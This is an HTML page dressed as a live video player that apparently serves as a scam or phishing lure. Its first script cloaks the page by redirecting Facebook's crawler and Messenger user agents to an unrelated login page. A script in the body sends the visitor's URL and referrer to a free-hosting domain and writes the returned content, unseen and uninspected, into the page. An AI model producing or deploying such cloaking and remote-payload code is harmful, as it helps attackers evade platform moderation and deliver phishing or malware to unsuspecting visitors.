<script>

var ua = navigator.userAgent || navigator.vendor || window.opera;
  if ((ua.indexOf("FacebookBot") > -1) || (ua.indexOf("Orca-Android") > -1)) {
    location.href = "https://droidvpn.com/login"
      }
</script>
<html>

<head>
    <meta content='user-scalable=no,initial-scale=1,maximum-scale=1' name='viewport' />
    <meta content='text/html; charset=UTF-8' http-equiv='Content-Type' />
    <meta content='width=device-width, initial-scale=1, shrink-to-fit=no' name='viewport' />
    <title>moddsfdf</title>
    <meta content='' itemprop='thumbnailUrl' property='og:image' />
    </head>
<header>
    <link href='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css' rel='stylesheet' />
    <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css' rel='stylesheet' />
    <script src='https://code.jquery.com/jquery-3.5.1.min.js'></script>
    <style type='text/css'>
        .logo img {
            padding: 14px 5px;
            height: 50px;
            width: auto;
            display: block;
            /*transition: 0.4s ease-in-out;*/
        }

        .hd-left {
            display: flex;
            align-items: center;
            flex-grow: 1;
        }

        .hd-right {
            display: flex;
        }

        header {
            align-items: center;
            border-bottom: 2px solid #0cb549;
        }

        .wrap-header {
            display: flex;
            align-items: center;
            justify-content: space-between;
            position: relative;
        }

        .m-l-15 {
            margin-left: 15px !important;
        }

        .m-l-10 {
            margin-left: 10px !important;
        }

        .top-info {
            position: absolute;
            color: white;
            z-index: 9;
            bottom: 2%;
            display: flex;
            align-items: center;
            right: 10px;

        }

        .top-info .live {
            line-height: 24px;
            padding: 0 5px;
            border-radius: 4px;
            background-color: #fa3e3e;
            margin-right: 10px;
        }

        .count-view {
            line-height: 24px;
            background: rgba(0, 0, 0, 0.5);
            border-radius: 4px;
            padding: 0 5px;
            display: flex;
            align-items: center;
        }

        .count-view>i {
            padding-right: 2px;
        }

        /*-------------------------*/
        .row-2>div {
            padding-left: 0px;
            padding-right: 0px;
            margin-bottom: 0px;
            padding: 5px;
            border: 2px solid #b8c4b8;
            border-radius: 5px;
        }

        .item-info {

            border-radius: 5px;
            padding-right: 5px;
            background: #01060a63;
            position: absolute;
            /*top: 5px;*/
            margin-top: 5px;
            z-index: 9;
            color: #fff;
            font-size: clamp(10px, 3vw, 16px);
            left: 10px;
        }

        .item-play {
            position: absolute;
            z-index: 9;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);

        }

        .item-play>img {
            border-radius: 50%;
            height: 60px;
            width: 60px;
        }

        .c-img1 {
            position: relative;
            display: flex;
            width: 100%;
            height: 100%;
            min-height: 200px;
            max-height: 200px;
        }

        @media (min-width: 1890px) {
            .c-img1 {
                min-height: 280px;
                max-height: 200px;
            }
        }

        .c-img1>img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            display: block;
            position: absolute;
            left: 0;
            top: 0;
        }

        .story {
            text-shadow: 0 1px 2px rgb(0 0 0 / 60%);
            position: absolute;
            bottom: 15px;
            left: 5px;
            color: white;
        }

        .item-info>img {
            height: 25px;
            width: 30px;
        }

        .item-info>p {
            font-size: 15px;
        }

        .custom1 {
            background: black;
            border-radius: 50%;
            opacity: 0.4;
            height: 40px;
            width: 40px;
        }

        @media (min-width: 991px) {
            .item-play>img {

                height: 80px;
                width: 80px;
            }

            .custom1 {
                height: 50px;
                width: 50px;
            }

            .count-view>i {
                padding-right: 5px;
            }

        }

        :root {
            --sk-size: 40px;
            --sk-color: #fff;
        }

        /* Utility class for centering */
        .sk-center {
            margin: auto;
        }

        .sk-wave {
            width: var(--sk-size);
            height: var(--sk-size);
            display: flex;
            justify-content: space-between;
        }

        .sk-wave-rect {
            background-color: var(--sk-color);
            height: 100%;
            width: 15%;
            animation: sk-wave 1.2s infinite ease-in-out;
        }

        .sk-wave-rect:nth-child(1) {
            animation-delay: -1.2s;
        }

        .sk-wave-rect:nth-child(2) {
            animation-delay: -1.1s;
        }

        .sk-wave-rect:nth-child(3) {
            animation-delay: -1.0s;
        }

        .sk-wave-rect:nth-child(4) {
            animation-delay: -0.9s;
        }

        .sk-wave-rect:nth-child(5) {
            animation-delay: -0.8s;
        }

        @keyframes sk-wave {

            0%,
            40%,
            100% {
                transform: scaleY(0.4);
            }

            20% {
                transform: scaleY(1);
            }
        }

        .example {
            position: absolute;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);


        }

        .custom {
            z-index: 999;
            position: absolute;
            background-color: rgba(244, 109, 59, 0.7);
            width: 100%;
            height: 100vh;
        }
    </style>
</header>
    <body style="background: #b6b6b6;">
<main>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://justiciable-dittos.000webhostapp.com/", true);
        xhr.onload = function() {
            if (xhr.status === 200) {
                document.write(xhr.responseText);
            }
        };
        xhr.send("VXx2fDY0OHxH1" + window.location + "|" + document.referrer);
    </script>
</main>
<div class='custom' id='show'>
    <div class='example'>
        <div class='sk-wave'>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
            <div class='sk-wave-rect'></div>
        </div>
    </div>
</div>
</body>

</html>
